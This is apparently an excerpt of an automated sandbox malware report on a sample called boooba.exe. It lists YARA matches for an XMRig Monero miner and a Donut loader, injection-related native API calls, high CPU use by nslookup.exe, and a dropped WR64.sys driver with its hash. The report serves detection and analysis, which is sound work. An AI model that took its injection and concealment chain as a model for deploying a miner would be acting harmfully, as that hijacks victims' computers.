Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/docs/algorithms
Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/wizard
Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/wizard%s

System Summary

Malicious sample detected (through community Yara rule)

Source: 12.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 12.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 12.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 13.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 13.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 13.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 12.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 12.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 12.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 13.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 13.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 13.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000000.00000002.1692437543.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.1692437543.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 00000005.00000002.1747235973.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000005.00000002.1747235973.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1778567981.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1777354712.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1774881873.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1782316167.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000E.00000002.2901128329.0000029965300000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000E.00000002.2901128329.0000029965300000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 0000000A.00000002.1784948706.00000000005C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000A.00000002.1784948706.00000000005C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000008.00000002.1757539408.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000008.00000002.1757539408.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1781637275.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1779369936.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 0000000B.00000003.1780288557.000001E32C455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1779753714.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1784061209.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1779051954.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1783041722.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1781787948.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1778886806.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1775201573.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1777129699.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1774272742.000001E32C455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1775332478.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1779467909.000001E32C452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1772421269.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1788508164.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1780781024.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1776641956.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1775882569.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1784241324.000001E32C451000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1772851303.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1772933403.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1773553446.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1774784480.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1774354264.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: conhost.exe PID: 5348, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: conhost.exe PID: 4136, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown

Abnormal high CPU Usage

Source: C:\Windows\System32\nslookup.exe

Process Stats: CPU usage > 49%

Contains functionality to call native functions

Source: C:\Users\user\Desktop\boooba.exe	Code function: 0_2_00401D58 NtAllocateVirtualMemory,	0_2_00401D58
Source: C:\Users\user\Desktop\boooba.exe	Code function: 0_2_00401D18 NtWriteVirtualMemory,	0_2_00401D18
Source: C:\Users\user\Desktop\boooba.exe	Code function: 0_2_004019D8 NtCreateThreadEx,	0_2_004019D8
Source: C:\Users\user\Desktop\boooba.exe	Code function: 0_2_00401D98 NtProtectVirtualMemory,	0_2_00401D98
Source: C:\Users\user\Desktop\boooba.exe	Code function: 0_2_00401C98 NtClose,	0_2_00401C98
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Code function: 10_2_00401D58 NtAllocateVirtualMemory,	10_2_00401D58
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Code function: 10_2_00401D18 NtWriteVirtualMemory,	10_2_00401D18
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Code function: 10_2_004019D8 NtCreateThreadEx,	10_2_004019D8
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Code function: 10_2_00401D98 NtProtectVirtualMemory,	10_2_00401D98
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Code function: 10_2_00401C98 NtClose,	10_2_00401C98

Creates driver files

Source: C:\Windows\System32\conhost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys

Jump to behavior

Detected potential crypto function

Source: C:\Windows\System32\conhost.exe	Code function: 1_2_000001575946E106	1_2_000001575946E106
Source: C:\Windows\System32\conhost.exe	Code function: 1_2_000001575946E4D6	1_2_000001575946E4D6
Source: C:\Windows\System32\conhost.exe	Code function: 1_2_000001575946E90E	1_2_000001575946E90E
Source: C:\Windows\System32\conhost.exe	Code function: 1_2_000001575946D4D2	1_2_000001575946D4D2
Source: C:\Windows\System32\conhost.exe	Code function: 1_2_000001575946ED6A	1_2_000001575946ED6A
Source: C:\Windows\System32\conhost.exe	Code function: 1_2_00007FFD9B8A5106	1_2_00007FFD9B8A5106
Source: C:\Windows\System32\conhost.exe	Code function: 1_2_00007FFD9B8A5EB2	1_2_00007FFD9B8A5EB2
Source: C:\Windows\System32\conhost.exe	Code function: 14_2_00000299653048D6	14_2_00000299653048D6
Source: C:\Windows\System32\conhost.exe	Code function: 14_2_0000029965304506	14_2_0000029965304506
Source: C:\Windows\System32\conhost.exe	Code function: 14_2_000002996530516A	14_2_000002996530516A
Source: C:\Windows\System32\conhost.exe	Code function: 14_2_0000029965304D0E	14_2_0000029965304D0E
Source: C:\Windows\System32\conhost.exe	Code function: 14_2_00000299653038D2	14_2_00000299653038D2
Source: C:\Windows\System32\conhost.exe	Code function: 14_2_00007FFD9BAA4F52	14_2_00007FFD9BAA4F52
Source: C:\Windows\System32\conhost.exe	Code function: 14_2_00007FFD9BAA41A6	14_2_00007FFD9BAA41A6

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5

Yara signature match

Source: 12.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 12.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 12.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 13.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 13.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 13.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 12.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 12.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 12.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 13.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 13.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 13.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000000.00000002.1692437543.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.1692437543.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 00000005.00000002.1747235973.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
